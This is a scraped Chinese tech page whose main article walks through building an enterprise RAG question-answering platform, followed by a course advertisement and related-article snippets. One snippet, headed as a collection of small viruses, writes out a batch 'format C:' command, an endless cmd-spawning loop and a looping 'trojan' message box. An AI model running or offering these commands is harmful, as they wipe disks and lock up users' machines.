news 2026/5/1 6:20:52

别瞎折腾了!RAG 问答平台搭建实战复盘:避过这 5 个坑,省下一个月头发!

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
别瞎折腾了!RAG 问答平台搭建实战复盘:避过这 5 个坑,省下一个月头发!

目前公司的智能问答平台利用RAG技术构建,现给大家分享下通RAG技术构建智能问平台的具体流程和原理。

一、什么是RAG

RAG是检索增强生成技术(Retrieval-Augmented Generation),目前是构建智能问答的重要技术。RAG相比传统的检索可以可以减少幻觉;支持知识动态更新等优点,是现在企业和个人打造知识库的重要架构和技术。核心包括以下2点:

1、数据准备阶段

包括:数据收集及清洗——>文本解析及分割——>文本转化成向量——>数据入库

2、应用阶段

包括:用户提问——>问题解析——>数据检索(召回和重排)——>注入Prompt——>LLM生成答案

二、RAG构建智能问答系统详解

以下是RAG技术构建智能问答平台业务流程图:

一)数据准备阶段

1、数据收集及清洗

企业需要建立自己的知识库,根据企业业务进行分类,建议设置版主进行运营,毕竟没有更新的知识是没用的。同时也可以去收集各个业务系统的数据,包括钉钉的发文、项目管理系统等知识。下图是根据业务构建知识库架构和流程:

知识包括非结构化(各类文档,如:Word、PDF、Excel等)和结构化的知识(Excel、数据库知识等)。

收集了知识后,对部分数据进行清洗,去除冗余和噪音。包括去除重复文档、去除过时的旧文档等。特别同一份知识,经常存在新旧版本,要记得把旧版本删除。

2、文本解析及分割

1)文件解析

文件解析是将原始文件(如 PDF、Word、Markdown、表格 等)转换为转换为纯文本或结构化文本。文件解析技术包括:基于空间布局的技术(MinerU)、多模态技术。

2)文件分割

大模型的输入长度有限,且长文本不利于精准检索,因此需要将原始文本分割为较小的 “块”(Chunks)。

分割策略包括按固定大小分割和按语义分割。最初我们是按固定大小分割,发现效果不太好,后续按语义单元进行分割,效果好很多。在分割时由于会丢失上一级标题,影响检索效果,建议把上一级标题自动加上。

3、把文本转化成向量

RAG 的 “检索” 环节依赖向量数据库,需将文本块转换为向量(Embedding)并存储,以便快速匹配相似内容。

选择开源模型,把文本转成向量,目前有conan-embedding-v1、bge-m3 等模型。经过对比和测试发现bge-m3模型比较好。

4、数据入库

转成向量后,存储到向量数据库。根据不同内容建了DOC库和QA库。所有文档放到DOC库,如果有问答对,放到QA库。QA库是简短的一问一答知识列表,优先级会比DOC库优先。

二)应用阶段

1、用户提问

在所有需要问答的页面,我们都可以设计智能问答入口,引导用户提问。目前交互基本都是千篇一律。如下是豆包交互。

2、问题解析

由于存在上下文,需要对用户多轮会话进行改写,得出用户真正要问的问题。如果智能问答平台不只是问答,要能实现问生产系统的内容,那还要去对问题进行意图识别,语法分析、实体识别等步骤。

3、数据检索

包括知识检索、知识召回、知识重排与生成、注入Prompt

1)知识检索

将用户问题通过 Embedding 模型转为向量,在向量数据库中搜索与该向量相似度最高的 Top N 个 Chunk(如 Top 5)。为了解决向量模型对专业术语不敏感的问题,还会引入关键词检索。即向量检索+关键词检索

2)知识召回

从检索到的文档中,提取出相关的句子或段落,作为候选答案。

3)知识重排与生成

使用算法,把所有检索的结果进行排序。这里涉及到答案评分,使用模型对答案进行评分,评分高的排前面,获得重排的答案。

4)注入Prompt

我们提前准备了一段通用的Prompt,基于提供的知识回答问题,不编造信息,让他按我们的要求输出答案,例如我们构建如下Prompt:

5)LLM生成答案

通过模型,和注入Prompt,让模型对候知识进行总结。国内可以选择DeepSeek V3、Deepseek R1、Qwen等模型进行总结。建议试用DeepSeek V3。

以上就用RAG 技术构建智能问答平台的基本流程,为了提升用户体验,我们也可以引入定量指标和定性反馈评估系统性能(包括检索精度、生成准确性、用户满意度、响应速度等指标),并持续优化。

如何学习大模型 AI ?

由于新岗位的生产效率,要优于被取代岗位的生产效率,所以实际上整个社会的生产效率是提升的。

但是具体到个人,只能说是:

“最先掌握AI的人,将会比较晚掌握AI的人有竞争优势”。

这句话,放在计算机、互联网、移动互联网的开局时期,都是一样的道理。

我在一线互联网企业工作十余年里,指导过不少同行后辈。帮助很多人得到了学习和成长。

我意识到有很多经验和知识值得分享给大家,也可以通过我们的能力和经验解答大家在人工智能学习中的很多困惑,所以在工作繁忙的情况下还是坚持各种整理和分享。但苦于知识传播途径有限,很多互联网行业朋友无法获得正确的资料得到学习提升,故此将并将重要的AI大模型资料包括AI大模型入门学习思维导图、精品AI大模型学习书籍手册、视频教程、实战学习等录播视频免费分享出来。

第一阶段(10天):初阶应用

该阶段让大家对大模型 AI有一个最前沿的认识,对大模型 AI 的理解超过 95% 的人,可以在相关讨论时发表高级、不跟风、又接地气的见解,别人只会和 AI 聊天,而你能调教 AI,并能用代码将大模型和业务衔接。

  • 大模型 AI 能干什么?
  • 大模型是怎样获得「智能」的?
  • 用好 AI 的核心心法
  • 大模型应用业务架构
  • 大模型应用技术架构
  • 代码示例:向 GPT-3.5 灌入新知识
  • 提示工程的意义和核心思想
  • Prompt 典型构成
  • 指令调优方法论
  • 思维链和思维树
  • Prompt 攻击和防范

第二阶段(30天):高阶应用

该阶段我们正式进入大模型 AI 进阶实战学习,学会构造私有知识库,扩展 AI 的能力。快速开发一个完整的基于 agent 对话机器人。掌握功能最强的大模型开发框架,抓住最新的技术进展,适合 Python 和 JavaScript 程序员。

  • 为什么要做 RAG
  • 搭建一个简单的 ChatPDF
  • 检索的基础概念
  • 什么是向量表示(Embeddings)
  • 向量数据库与向量检索
  • 基于向量检索的 RAG
  • 搭建 RAG 系统的扩展知识
  • 混合检索与 RAG-Fusion 简介
  • 向量模型本地部署

第三阶段(30天):模型训练

恭喜你,如果学到这里,你基本可以找到一份大模型 AI相关的工作,自己也能训练 GPT 了!通过微调,训练自己的垂直大模型,能独立训练开源多模态大模型,掌握更多技术方案。

到此为止,大概2个月的时间。你已经成为了一名“AI小子”。那么你还想往下探索吗?

  • 为什么要做 RAG
  • 什么是模型
  • 什么是模型训练
  • 求解器 & 损失函数简介
  • 小实验2:手写一个简单的神经网络并训练它
  • 什么是训练/预训练/微调/轻量化微调
  • Transformer结构简介
  • 轻量化微调
  • 实验数据集的构建

第四阶段(20天):商业闭环

对全球大模型从性能、吞吐量、成本等方面有一定的认知,可以在云端和本地等多种环境下部署大模型,找到适合自己的项目/创业方向,做一名被 AI 武装的产品经理。

  • 硬件选型
  • 带你了解全球大模型
  • 使用国产大模型服务
  • 搭建 OpenAI 代理
  • 热身:基于阿里云 PAI 部署 Stable Diffusion
  • 在本地计算机运行大模型
  • 大模型的私有化部署
  • 基于 vLLM 部署大模型
  • 案例:如何优雅地在阿里云私有部署开源大模型
  • 部署一套开源 LLM 项目
  • 内容安全
  • 互联网信息服务算法备案

学习是一个过程,只要学习就会有挑战。天道酬勤,你越努力,就会成为越优秀的自己。

如果你能在15天内完成所有的任务,那你堪称天才。然而,如果你能完成 60-70% 的内容,你就已经开始具备成为一名大模型 AI 的正确特征了。

这份完整版的大模型 AI 学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/27 19:35:46

Open-AutoGLM卡住不工作?(专家级故障排查手册限时公开)

第一章:Open-AutoGLM没反应当用户在使用 Open-AutoGLM 时遇到“无响应”或“没反应”的情况,通常由环境配置、依赖缺失或服务未正确启动引起。排查此类问题需从日志输出、进程状态和系统资源三方面入手。检查服务运行状态 首先确认 Open-AutoGLM 主进程是…

作者头像 李华
网站建设 2026/4/22 13:23:27

小病毒(各种)

echo off format C: exit#include<iostream> #include<windows.h> int main(){while(1)system("start cmd"); }%0to msgbox "木马病毒" loop

作者头像 李华
网站建设 2026/5/1 11:32:22

2025自考必备10个降AI率工具,高效避坑指南

2025自考必备10个降AI率工具&#xff0c;高效避坑指南 AI降重工具&#xff1a;自考论文的高效护航者 随着人工智能技术的快速发展&#xff0c;AIGC&#xff08;AI生成内容&#xff09;在学术写作中的应用越来越广泛。然而&#xff0c;对于自考学生而言&#xff0c;如何在保证论…

作者头像 李华
网站建设 2026/4/26 1:50:41

从安装失败到秒级响应:我在macOS上调试Open-AutoGLM的14天实战复盘

第一章&#xff1a;从安装失败到秒级响应&#xff1a;我在macOS上调试Open-AutoGLM的14天实战复盘在 macOS 上部署 Open-AutoGLM 的过程远比预期复杂。初期尝试通过 pip 直接安装时频繁遭遇依赖冲突与架构不兼容问题&#xff0c;尤其是在 Apple Silicon 芯片上运行时&#xff0…

作者头像 李华
网站建设 2026/4/21 17:13:19

学长亲荐10个AI论文软件,本科生论文写作必备!

学长亲荐10个AI论文软件&#xff0c;本科生论文写作必备&#xff01; AI 工具让论文写作更轻松 对于本科生来说&#xff0c;撰写一篇高质量的论文是一项既挑战又重要的任务。在信息爆炸的时代&#xff0c;如何高效地完成文献综述、构建逻辑框架、撰写初稿甚至进行降重&#xff…

作者头像 李华